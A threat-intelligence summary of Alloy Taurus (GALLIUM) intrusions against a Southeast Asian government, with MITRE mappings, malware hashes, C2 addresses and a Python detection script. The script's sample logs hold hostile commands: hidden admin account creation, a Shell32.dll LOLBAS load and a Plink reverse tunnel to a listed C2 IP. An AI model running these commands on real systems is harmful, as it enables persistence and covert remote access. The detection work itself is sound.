Intrusions in two or more waves targeted a Southeast Asian government; the activity is attributed with moderate confidence to Alloy Taurus (GALLIUM), operating on behalf of Chinese state interests. The operations exploited Exchange Server vulnerabilities to deploy web shells, followed by a range of backdoors and tools used to establish a long-term foothold and expand within the compromised networks. #AlloyTaurus #GALLIUM #ChinaChopper #SoftEtherVPN #CobaltStrike #QuasarRAT #HDoor #Gh0stCringe #Winnti #Reshell #Zapoa #CL-STA-0045
Key points
- Alloy Taurus (GALLIUM) is linked to the CL-STA-0045 activity targeting a Southeast Asian government with multiwave intrusions.
- Initial access and persistence were gained by exploiting Exchange Server vulnerabilities and deploying web shells (notably China Chopper).
- Attackers deployed a wide toolset (Reshell, Zapoa, Gh0stCringe, Quasar RAT, HDoor, Winnti variant) and used Cobalt Strike beacons and LOLBAS techniques to expand access.
- Credential theft and lateral movement followed, including Kerbrute brute forcing, SAM hive access, LSASS dumping, NTLM downgrade attempts, and movement via AnyDesk and SoftEther VPN.
- Less-visible techniques included reverse SSH tunneling (HTran, Plink), PowerShell-enabled tool downloads, WMI usage, and PowerCat/Netcat-like utilities for C2 and data transfer.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – The attackers exploited vulnerabilities in Exchange Servers to deploy a large number of web shells. [‘…capitalized on vulnerabilities in Exchange Servers to deploy a large number of web shells….’]
- [T1059.003] Windows Command Shell – Reconnaissance commands were run from the shell, including whoami, ipconfig, dir, arp and net. [‘…running reconnaissance commands and tools (e.g., whoami, ipconfig, dir, arp and net, NBTScan)…’]
- [T1082] System Information Discovery – The intrusions included commands used to gather system information during reconnaissance. [‘…whoami, ipconfig, dir, arp and net…’]
- [T1136] Create Account – Administrative accounts were created (Admin$, Back$, infoma$, testuser) to maintain footholds. [‘…creating several administrative accounts (named Admin$, Back$, infoma$ and testuser).’]
- [T1003] OS Credential Dumping – Credential dumping activities included LSASS dumping, Mimikatz, LaZagne, SAM hive access and NTLM downgrade attempts. [‘…dumping Lsass; Mimikatz… NTLM downgrade attack…’]
- [T1047] Windows Management Instrumentation – The attackers used WMI and PowerShell in their operations. [‘…The attackers used Windows Management Instrumentation (WMI) and PowerShell…’]
- [T1021] Remote Services – Lateral movement leveraged SoftEther VPN and AnyDesk (with a default password) to reach target assets. [‘…abusing the remote administration tool AnyDesk…’]
- [T1572] Protocol Tunneling – Reverse SSH tunneling enabled direct RDP to compromised hosts via HTran and Plink. [‘…established a reverse Secure Shell (SSH) tunnel… to tunnel RDP connections…’]
- [T1218] Signed Binary Proxy Execution – The attackers used a LOLBAS technique that abuses Shell32.dll to run Cobalt Strike beacons. [‘…living-off-the-land binaries and scripts (LOLBAS) method of abusing the Windows Shell Common DLL (Shell32.dll)…’]
- [T1113] Screen Capture – Quasar RAT capabilities include screen capture. [‘Capturing screenshots’]
- [T1056] Input Capture – Quasar RAT capabilities include keylogging. [‘Keylogging’]
- [T1059.001] PowerShell – PowerShell was used to download tools and execute commands. [‘…PowerShell with the following command line.’]
Indicators of Compromise
Web Shells
- [File Hash] Web Shells – b87c125c8c3bf43096690bf74df960e2c0120654635c4ea715039fbe9115ecef, 009a9d1609592abe039324da2a8a69c4a305ca999920bf6bbef839273516783a, and 3 more hashes
Reshell Backdoor
- [File Hash] Reshell Backdoor – 4cb020a66fdbc99b0bce2ae24d5684685e2b1e9219fbdfda56b3aace4e8d5f66
Zapoa Backdoor
- [File Hash] Zapoa Backdoor – 128bc34ee9d907d017f2e6f8fbbba24c3e51ed5a2fdba417ba893b496c8c18a7
Cobalt Strike
- [File Hash] Cobalt Strike – fec2d328462c944e85dd112e61c97d3e67a39f3c83c59e07410d228c7222d153, 99d0764248491f44709bd000104f6f99e53c9de8d55649b45112320d7bc4deed, 9242846351a65655e93ed2aeaf36b535ff5b79ddf76c33d54089d9005a66265b
Quasar RAT
- [File Hash] Quasar RAT – 244cb0f526c2c99be0bf822463cd338630afa12ab32cc9b6cfd6e85fa315a478, 3e5c992b2be98efd3de5b13969900f207665116063a889b1c763371d4104f7f9
HDoor
- [File Hash] HDoor – bd5dcf5911f959dd79de046d151e8a4aed3b854a322135acc37e3edb3643d0e2
Gh0stCringe RAT
- [File Hash] Gh0stCringe RAT – f602bd56d6b4bf040956b86ed030643523a8b6611a21b5aafeaa82478820c395, d3b8f10f25545bed7d661b6a80be53356c00947800c7e53f050cb15b1f9b953b
Winnti-Related Backdoor
- [File Hash] Winnti-Related Backdoor – a6b33cf73dd85c18577f58a75802ea0820f11aba88fac23ee3794fac1f4bacfa, 0d0dd41677ff0d7d648f8563db3a4b4844d86d70562d844bad1983333ae5633d
Fscan
- [File Hash] Fscan – c27f0e68bc7f2ec2eede8a8e08fa341d41d5d2d0fb2b74260679a5504115947e
WebScan
- [File Hash] WebScan – dbdd0f4bf1f217d794738b7d4f83483a5b3579be8791a7e2f2a62ec3e839be3c
Kerbrute
- [File Hash] Kerbrute – 5aa035ebc3359ee8517d99569c8881fcb7f48ab7e9a2f101f7e7ec23e636c79b
LsassUnhooker
- [File Hash] LsassUnhooker – 225e5818dc7e7b23110f64fbb718c1792ad93ba7eb893bfbee96cdb13180fbf7
InternalMonologue.exe
- [File Hash] InternalMonologue.exe – c74897b1e986e2876873abb3b5069bf1b103667f7f0e6b4581fbda3fd647a74a
Infrastructure
- [IP] 159.223.85.37, 156.251.162.29
- [Domain] shell.cdn-sina.tw, images.cdn-sina.tw
Reshell URI Pattern
- [URI] /sbName/, /Sleep/hostname=
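As an added detection example (not code from the Unit 42 report or this summary), the Python below turns several behaviours listed in the techniques and indicator sections into rules and runs them over constructed proxy and process-creation records: the C2 hosts and Reshell URI pattern from the indicator list, creation of the named administrative accounts, the Shell32.dll LOLBAS pattern, and a Plink reverse tunnel. The record format, rule names and sample values are assumptions made for the example.

```python
import re
# Page-derived indicators (C2 hosts, Reshell URI, created account names); the rules are constructed.
C2_HOSTS = {"shell.cdn-sina.tw", "images.cdn-sina.tw", "159.223.85.37", "156.251.162.29"}
RESHELL_URI = re.compile(r"/sbName/|/Sleep/hostname=")
ROGUE_ACCOUNTS = {"admin$", "back$", "infoma$", "testuser"}
NET_USER_ADD = re.compile(r"\bnet1?(?:\.exe)?\s+user\s+(\S+)\s+\S+\s+/add", re.I)
PLINK_REVERSE = re.compile(r"\bplink(?:\.exe)?\b.*\s-R\s")  # -R = remote port forward
USER_WRITABLE = re.compile(r"c:\\users\\|c:\\programdata\\|\\temp\\", re.I)

# Constructed sample events in a hypothetical "kind|key=value|..." format (proxy / proc).
SAMPLE_LOGS = [
    "proxy|host=images.cdn-sina.tw|uri=/Sleep/hostname=WS01|src=10.0.0.5",
    "proxy|host=cdn.example.org|uri=/index.html|src=10.0.0.6",
    "proc|image=C:\\Windows\\System32\\net.exe|cmd=net user Back$ P@ss /add|user=SRV01$",
    "proc|image=C:\\Windows\\System32\\rundll32.exe|cmd=rundll32.exe shell32.dll,Control_RunDLL C:\\Users\\Public\\b.dll|user=web",
    "proc|image=C:\\Tools\\plink.exe|cmd=plink.exe -N -R 3389:127.0.0.1:3389 user@159.223.85.37|user=web",
    "proc|image=C:\\Windows\\explorer.exe|cmd=explorer.exe|user=alice",
]

def parse(line):
    # Split one record into a dict; partition() keeps any '=' inside a value intact.
    kind, *fields = line.split("|")
    return {"kind": kind, **dict(f.partition("=")[::2] for f in fields)}

def check(rec):
    # Return the names of the report-derived rules this record matches.
    hits = []
    if rec["kind"] == "proxy":
        if rec.get("host", "").lower() in C2_HOSTS:
            hits.append("known-c2-host")
        if RESHELL_URI.search(rec.get("uri", "")):
            hits.append("reshell-uri")
    elif rec["kind"] == "proc":
        cmd = rec.get("cmd", "")
        low = cmd.lower()
        m = NET_USER_ADD.search(cmd)
        if m and m.group(1).lower() in ROGUE_ACCOUNTS:
            hits.append("rogue-account-create")
        if "rundll32" in low and "shell32.dll" in low and USER_WRITABLE.search(cmd):
            hits.append("shell32-lolbas")  # Shell32.dll LOLBAS loading a DLL from a user-writable path
        if PLINK_REVERSE.search(cmd):
            hits.append("plink-reverse-tunnel")
        if any(host in low for host in C2_HOSTS):
            hits.append("known-c2-host")
    return hits

def scan(lines):
    # Run every rule over every record; return (index, matched rules) for the hits only.
    return [(i, h) for i, h in ((i, check(parse(l))) for i, l in enumerate(lines)) if h]
```

Hash-based indicators are deliberately left out of the rules: they are cheap for the actor to change, whereas the URI pattern, account names and tunnelling behaviour survive recompilation.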
Read more: https://unit42.paloaltonetworks.com/alloy-taurus-targets-se-asian-government/